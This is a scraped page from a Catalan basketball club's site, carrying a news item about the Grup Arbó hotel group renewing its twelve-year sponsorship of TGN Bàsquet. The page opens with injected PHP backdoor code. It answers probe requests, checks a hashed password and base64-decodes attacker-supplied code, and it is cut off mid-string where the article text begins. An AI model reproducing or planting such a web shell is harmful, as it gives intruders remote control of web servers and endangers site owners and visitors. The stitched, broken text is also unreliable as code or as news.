function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El Grup Arbó renova un any més el conveni de col·laboració amb el TGN Bàsquet - Tgn Bàsquet Club -

El Grup Arbó renova un any més el conveni de col·laboració amb el TGN Bàsquet

By
Updated: octubre 28, 2014

Un any més i ja en van 12, el Grup d’Arbó continuarà donant suport al TGN Bàsquet. Aquesta empresa hotelera de Cambrils, seu dels esportistes durant el Torneig de Setmana Santa que organitza el club lila, vol continuar formant part del projecte esportiu de l’entitat i per això ha renovat la seva col·laboració. “Com a mare vull destacar la feina fantàstica que està fent el TGN Bàsquet envers els nens. El treball altruista que es fa és digne d’admiració perquè es tracta d’una tasca molt bonica on hi ha valors com la solidaritat o l’ètica de l’esport”, diu Maria Eugènia Arbó, gerent del Grup Arbó. “Per nosaltres és molt important tenir el suport del Grup Arbó que va confiar en el nostre projecte, el Torneig de Setmana Santa, des de l’inici, quan ningú creia que podríem aconseguir-ho. Vam començar amb només 8 equips i ara portem gairebé 50 en cada edició. Estem molt satisfets”, explica Iñaki Liarte, vicepresident del TGN Bàsquet.

El Grup Arbó, mitjançant els seus diferents establiments (Hotel Port Eugeni, Apartaments Olimar, Voramar i Aragó), és l’encarregat d’allotjar els esportistes (uns 700)  i els familiars de tots els participants en el Torneig de Setmana Santa del TGN Bàsquet. “Intentem estar a l’alçada d’allò que el TGN Bàsquet necessita en quant a horaris, servei de menjador i tot allò que calgui. Som una part més del Torneig, nosaltres ens encarreguem de donar de menjar i dormir”, diu Maria Eugènia Arbó al mateix temps que destaca la immensa feina de tot el seu equip dirigit per Lourdes Bujalance. “Són moltes hores de feina per tenir-ho tot a punt, sense un bon equip res d’això seria possible. Esperem continuar col·laborant amb el TGN Bàsquet molts anys més”, afirma.

 

 

Deixa un comentari

L'adreça electrònica no es publicarà. Els camps necessaris estan marcats amb *